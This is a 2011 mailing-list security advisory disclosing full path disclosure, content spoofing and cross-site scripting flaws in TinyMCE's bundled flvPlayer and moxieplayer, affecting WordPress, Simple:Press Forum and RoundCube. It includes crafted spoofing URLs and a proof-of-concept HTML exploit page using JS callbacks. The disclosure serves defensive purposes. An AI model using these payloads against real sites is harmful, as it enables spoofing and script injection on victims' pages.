Hello list!

I want to warn you about multiple vulnerabilities in TinyMCE and flvPlayer 
and hundreds of web applications and tens millions of web sites.

These are Full path disclosure, Content Spoofing and Cross-Site Scripting 
vulnerabilities in TinyMCE (CS and XSS are in flvPlayer, which is included 
with TinyMCE).

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of TinyMCE, which include these files. And 
vulnerable (to CS and XSS) are all versions of flvPlayer (flvPlayer v1.0b).

And also all web applications, which are using these versions of TinyMCE and 
flvPlayer, and it's hundreds of web applications and tens millions of web 
sites in Internet. By information from wordpress.com, at present there are 
more then 67 millions of web sites only on WordPress, almost half of them 
are hosted at blog-hosting wordpress.com.

Particularly the next web applications are vulnerable:

* WordPress 2.6 - 3.1.1 (which I've checked, and potentially WP 2.5 - 3.2.1) 
to FPD. To Content Spoofing are vulnerable versions with file flv_player.swf 
(in plugin media in TinyMCE), which is in WP 2.6 - 3.0.1 (which I've 
checked, and potentially WP 2.5 - 3.0.5).
* Simple:Press Forum 4.4.5 and previous versions.
* RoundCube 0.6 and previous versions (checked in 0.4-beta and 0.6) to ŃS 
and XSS. In last version RoundCube 0.6 uses moxieplayer.swf (instead of 
flv_player.swf).
* And many other web applications.

----------
Details:
----------

Full path disclosure (WASC-13):

http://site/path/tinymce/plugins/spellchecker/classes/EnchantSpell.php

http://site/path/tinymce/plugins/spellchecker/classes/GoogleSpell.php

http://site/path/tinymce/plugins/spellchecker/classes/PSpell.php

http://site/path/tinymce/plugins/spellchecker/classes/PSpellShell.php

Content Spoofing (WASC-12):

For WordPress: 
http://site/wp-includes/js/tinymce/plugins/media/img/flv_player.swf

For Simple:Press Forum: 
http://site/wp-content/plugins/simple-forum/editors/tinymce/plugins/img/media/flv_player.swf

For RoundCube: 
http://site/program/js/tiny_mce/plugins/media/img/flv_player.swf

Swf-file of flvPlayer accepts arbitrary addresses in parameter flvToPlay and 
startImage, which allows to spoof content of flash - i.e. by setting 
addresses of video and/or image files from other site.

http://site/flv_player.swf?flvToPlay=1.flv

http://site/flv_player.swf?autoStart=false&startImage=1.jpg

http://site/flv_player.swf?flvToPlay=1.flv&autoStart=false&startImage=1.jpg

Swf-file of flvPlayer accepts arbitrary addresses in parameter flvToPlay, 
which allows to spoof content of flash - i.e. by setting address of playlist 
file from other site (parameters thumbnail and url in xml-file accept 
arbitrary addresses).

http://site/flv_player.swf?flvToPlay=1.xml

File 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
 <item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
 <item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

XSS (WASC-08):

If at the site at page with flv_player.swf (with parameter jsCallback=true, 
or if there is possibility to set this parameter for flv_player.swf) there 
is possibility to include JS code with function flvStart() and/or flvEnd() 
(via HTML Injection), then it's possible to conduct XSS attack. I.e. 
JS-callbacks can be used for XSS attack.

Example of exploit:

<html>
<body>
<script>
function flvStart() {
 alert('XSS');
}
function flvEnd() {
 alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%" 
height="50%" quality=high 
pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" 
type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Starting from TinyMCE 3.4b2, it includes moxieplayer.swf.

Content Spoofing (WASC-12):

http://site/path/moxieplayer.swf?url=http://site2/1.flv

This swf-file accepts arbitrary addresses in parameter url, which allows to 
spoof content of flash - i.e. by setting address of video file from other 
site.

------------
Timeline:
------------

2011.10.15 - found vulnerabilities.
2011.10.17 - announced at my site.
2011.10.20 - informed developer of flvPlayer.
2011.10.20 - informed developer of TinyMCE. During my conversation with 
developer during October-November, he wanted to fix these holes, but it took 
much more time, then he thought at first. He is working on fix, which will 
be released in future version of TinyMCE.
2011.10.21 - informed developer of RoundCube. During my conversation with 
developer during October-November, he decided to fix them and was working on 
fix for these and other holes, which I've informed him.
2011.11.23 - developer of RoundCube informed that all fixes have been made 
and would be added to the next release RoundCube 0.7.
2011.11.23 - disclosed at my site.

I mentioned about these vulnerabilities at my site:
http://websecurity.com.ua/5444/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua